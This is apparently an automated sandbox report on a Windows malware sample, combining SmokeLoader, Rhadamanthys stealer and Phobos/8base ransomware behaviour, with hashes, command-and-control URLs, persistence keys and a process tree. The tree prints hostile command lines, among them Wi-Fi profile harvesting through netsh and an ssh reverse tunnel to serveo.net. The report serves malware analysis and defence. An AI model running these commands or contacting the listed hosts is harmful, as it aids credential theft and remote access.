Analysis
max time kernel: 78s
max time network: 131s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-09-2023 20:50
Static task: static1
Behavioral task: behavioral1
Sample: 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
Resource: win10v2004-20230915-en
General
Target: 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
Size: 1.9MB
MD5: 1b87684768db892932be3f0661c54251
SHA1: e5acdb93f6eb75656c9a8242e21b01bf978dc7cf
SHA256: 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
SHA512: 0fc3cc6ed99e45a3d1ca7cd2dd4d7bfc2f5f11ee7cf0e3d58bfbb4db26f16599cae45b96fc032cd6a050c1ea70bfd02291537088168dd149eee85b38d2527a82
SSDEEP: 24576:jx4Ul0rrIOGz9I6U7AeyGvHynlLghECQl4L529dktxtPCv1ri+J/ac//zWOYopmB:mUl0/2kHW8ECQl4wi+snopp2vQ
Malware Config
Extracted
smokeloader
2022
http://servermlogs27.xyz/statweb255/
http://servmblog45.xyz/statweb255/
http://demblog575.xyz/statweb255/
http://admlogs85x.xyz/statweb255/
http://blogmstat389.xyz/statweb255/
http://blogmstat255.xyz/statweb255/
Signatures
Ammyy Admin
Remote admin tool with various capabilities.
AmmyyAdmin payload 2 IoCs
resource | yara_rule
behavioral1/files/0x00060000000232c2-7546.dat | family_ammyyadmin
behavioral1/files/0x00060000000232c2-7877.dat | family_ammyyadmin
Detect rhadamanthys stealer shellcode 6 IoCs
resource | yara_rule
behavioral1/memory/4256-15-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
behavioral1/memory/4256-16-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
behavioral1/memory/4256-14-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
behavioral1/memory/4256-17-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
behavioral1/memory/4256-27-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
behavioral1/memory/4256-29-0x0000000002DD0000-0x00000000031D0000-memory.dmp | family_rhadamanthys
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
Phemedrone
An information and wallet stealer written in C#.
Phobos
Phobos ransomware appeared at the beginning of 2019.
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4256 created 3196 | 4256 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe | 50
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
2516 | bcdedit.exe
1348 | bcdedit.exe
Renames multiple (251) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
pid | Process
276 | wbadmin.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
pid | Process
3320 | netsh.exe
4392 | netsh.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | 781D.exe
Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | 75DA.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n6)ZqKc3{.exe | n6)ZqKc3{.exe
Executes dropped EXE 16 IoCs
pid | Process
1508 | n6)ZqKc3{.exe
3176 | pZW}X.exe
3548 | n6)ZqKc3{.exe
212 | pZW}X.exe
1516 | n6)ZqKc3{.exe
2184 | n6)ZqKc3{.exe
3756 | 6E45.exe
1080 | 705A.exe
4576 | 6E45.exe
4004 | 6E45.exe
5000 | 73A6.exe
5092 | 75DA.exe
4480 | 781D.exe
548 | 8405.exe
3604 | Ynigope.exe
4452 | Ynigope.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles 1 TTPs 12 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | certreq.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" | n6)ZqKc3{.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" | n6)ZqKc3{.exe
Drops desktop.ini file(s) 4 IoCs
description | ioc | Process
File opened for modification | C:\$Recycle.Bin\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini | n6)ZqKc3{.exe
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini | n6)ZqKc3{.exe
File opened for modification | C:\Program Files\desktop.ini | n6)ZqKc3{.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | n6)ZqKc3{.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
99 | ip-api.com
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 3796 set thread context of 4256 | 3796 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe | 87
PID 3176 set thread context of 212 | 3176 | pZW}X.exe | 103
PID 1508 set thread context of 3548 | 1508 | n6)ZqKc3{.exe | 104
PID 1516 set thread context of 2184 | 1516 | n6)ZqKc3{.exe | 107
PID 3756 set thread context of 4004 | 3756 | 6E45.exe | 127
PID 5000 set thread context of 4156 | 5000 | 73A6.exe | 133
PID 5092 set thread context of 2888 | 5092 | 75DA.exe | 139
PID 4480 set thread context of 3816 | 4480 | 781D.exe | 138
Drops file in Program Files directory 64 IoCs
All 64 entries below have Process = n6)ZqKc3{.exe.
description | ioc
File created | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml
File opened for modification | C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll
File opened for modification | C:\Program Files\Common Files\System\Ole DB\it-IT\sqlxmlx.rll.mui
File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\msinfo32.exe.mui
File created | C:\Program Files\Java\jre1.8.0_66\bin\awt.dll.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar
File created | C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms
File created | C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar
File opened for modification | C:\Program Files\7-Zip\Lang\va.txt
File created | C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-ms
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ul-oob.xrm-ms
File created | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\7-Zip\Lang\si.txt
File created | C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\OSFROAMINGPROXY.DLL
File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120.dll
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-ms
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\bin\plugin2\msvcr100.dll
File created | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected][4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Smokey Glass.eftx.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms
File created | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms
File created | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-convert-l1-1-0.dll
File created | C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms
File created | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-timezone-l1-1-0.dll
File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar
File created | C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll
File opened for modification | C:\Program Files\Microsoft Office\root\Client\msvcr120.dll
File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base
File opened for modification | C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 2 IoCs
pid | pid_target | Process | procid_target
3860 | 548 | WerFault.exe | 132
4988 | 548 | WerFault.exe | 132
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pZW}X.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pZW}X.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pZW}X.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | certreq.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | certreq.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3740 | vssadmin.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (consecutive identical entries are collapsed with a count; 64 entries in total, in report order)
3796 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe (x3)
4256 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe (x4)
4796 | certreq.exe (x4)
1508 | n6)ZqKc3{.exe
3176 | pZW}X.exe
212 | pZW}X.exe (x2)
1516 | n6)ZqKc3{.exe
3196 | Explorer.EXE (x22)
3548 | n6)ZqKc3{.exe (x2)
3196 | Explorer.EXE (x14)
3548 | n6)ZqKc3{.exe (x2)
3196 | Explorer.EXE (x8)
Suspicious behavior: MapViewOfSection 11 IoCs
pid | Process (consecutive identical entries are collapsed with a count)
212 | pZW}X.exe
3196 | Explorer.EXE (x10)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3796 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
Token: SeDebugPrivilege | 1508 | n6)ZqKc3{.exe
Token: SeDebugPrivilege | 3176 | pZW}X.exe
Token: SeDebugPrivilege | 1516 | n6)ZqKc3{.exe
Token: SeDebugPrivilege | 3548 | n6)ZqKc3{.exe
Token: SeBackupPrivilege | 3664 | vssvc.exe
Token: SeRestorePrivilege | 3664 | vssvc.exe
Token: SeAuditPrivilege | 3664 | vssvc.exe
Token: SeIncreaseQuotaPrivilege | 3716 | WMIC.exe
Token: SeSecurityPrivilege | 3716 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3716 | WMIC.exe
Token: SeLoadDriverPrivilege | 3716 | WMIC.exe
Token: SeSystemProfilePrivilege | 3716 | WMIC.exe
Token: SeSystemtimePrivilege | 3716 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3716 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3716 | WMIC.exe
Token: SeCreatePagefilePrivilege | 3716 | WMIC.exe
Token: SeBackupPrivilege | 3716 | WMIC.exe
Token: SeRestorePrivilege | 3716 | WMIC.exe
Token: SeShutdownPrivilege | 3716 | WMIC.exe
Token: SeDebugPrivilege | 3716 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3716 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 3716 | WMIC.exe
Token: SeUndockPrivilege | 3716 | WMIC.exe
Token: SeManageVolumePrivilege | 3716 | WMIC.exe
Token: 33 | 3716 | WMIC.exe
Token: 34 | 3716 | WMIC.exe
Token: 35 | 3716 | WMIC.exe
Token: 36 | 3716 | WMIC.exe
(the 21 WMIC.exe entries above, from SeIncreaseQuotaPrivilege through 36, appear a second time in the same order)
Token: SeBackupPrivilege | 3736 | wbengine.exe
Token: SeRestorePrivilege | 3736 | wbengine.exe
Token: SeSecurityPrivilege | 3736 | wbengine.exe
Token: SeShutdownPrivilege | 3196 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3196 | Explorer.EXE
Token: SeShutdownPrivilege | 3196 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3196 | Explorer.EXE
Token: SeDebugPrivilege | 3756 | 6E45.exe
Token: SeDebugPrivilege | 5000 | 73A6.exe
Token: SeDebugPrivilege | 5092 | 75DA.exe
Token: SeDebugPrivilege | 1080 | 705A.exe
Token: SeDebugPrivilege | 4480 | 781D.exe
Token: SeDebugPrivilege | 548 | explorer.exe
Token: SeDebugPrivilege | 4156 | aspnet_compiler.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (consecutive identical entries are collapsed with a count; 64 entries in total, in report order)
PID 3796 wrote to memory of 4148 | 3796 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe | 86 (x3)
PID 3796 wrote to memory of 4256 | 3796 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe | 87 (x8)
PID 4256 wrote to memory of 4796 | 4256 | 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe | 95 (x4)
PID 3176 wrote to memory of 212 | 3176 | pZW}X.exe | 103 (x6)
PID 1508 wrote to memory of 3548 | 1508 | n6)ZqKc3{.exe | 104 (x10)
PID 1516 wrote to memory of 2184 | 1516 | n6)ZqKc3{.exe | 107 (x10)
PID 3548 wrote to memory of 2880 | 3548 | n6)ZqKc3{.exe | 108 (x2)
PID 3548 wrote to memory of 4736 | 3548 | n6)ZqKc3{.exe | 110 (x2)
PID 4736 wrote to memory of 3320 | 4736 | cmd.exe | 112 (x2)
PID 2880 wrote to memory of 3740 | 2880 | cmd.exe | 113 (x2)
PID 2880 wrote to memory of 3716 | 2880 | cmd.exe | 116 (x2)
PID 4736 wrote to memory of 4392 | 4736 | cmd.exe | 117 (x2)
PID 2880 wrote to memory of 2516 | 2880 | cmd.exe | 118 (x2)
PID 2880 wrote to memory of 1348 | 2880 | cmd.exe | 119 (x2)
PID 2880 wrote to memory of 276 | 2880 | cmd.exe | 120 (x2)
PID 3196 wrote to memory of 3756 | 3196 | Explorer.EXE | 125 (x3)
PID 3196 wrote to memory of 1080 | 3196 | Explorer.EXE | 126 (x2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Processes
(indentation shows parent/child nesting; the bracketed number is the tree depth from the report)
[1] C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3196
  [2] C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3796
    [3] C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
      PID:4148
    [3] C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID:4256
  [2] C:\Windows\system32\certreq.exe
    cmdline: "C:\Windows\system32\certreq.exe"
    - Accesses Microsoft Outlook profiles
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4796
  [2] C:\Users\Admin\AppData\Local\Temp\6E45.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\6E45.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
    [3] C:\Users\Admin\AppData\Local\Temp\6E45.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\6E45.exe
      - Executes dropped EXE
      PID:4004
    [3] C:\Users\Admin\AppData\Local\Temp\6E45.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\6E45.exe
      - Executes dropped EXE
      PID:4576
  [2] C:\Users\Admin\AppData\Local\Temp\705A.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\705A.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
    [3] C:\Users\Admin\AppData\Local\Temp\705A.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\705A.exe"
      PID:4456
  [2] C:\Users\Admin\AppData\Local\Temp\75DA.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\75DA.exe
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5092
    [3] C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"
      - Executes dropped EXE
      PID:4452
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      PID:2888
  [2] C:\Users\Admin\AppData\Local\Temp\73A6.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\73A6.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      - Accesses Microsoft Outlook profiles
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
      PID:4156
      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        PID:4276
        [5] C:\Windows\SysWOW64\chcp.com
          cmdline: chcp 65001
          PID:2924
        [5] C:\Windows\SysWOW64\netsh.exe
          cmdline: netsh wlan show profiles
          PID:1816
        [5] C:\Windows\SysWOW64\findstr.exe
          cmdline: findstr /R /C:"[ ]:[ ]"
          PID:5088
      [4] C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
        cmdline: "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net
        PID:1464
      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
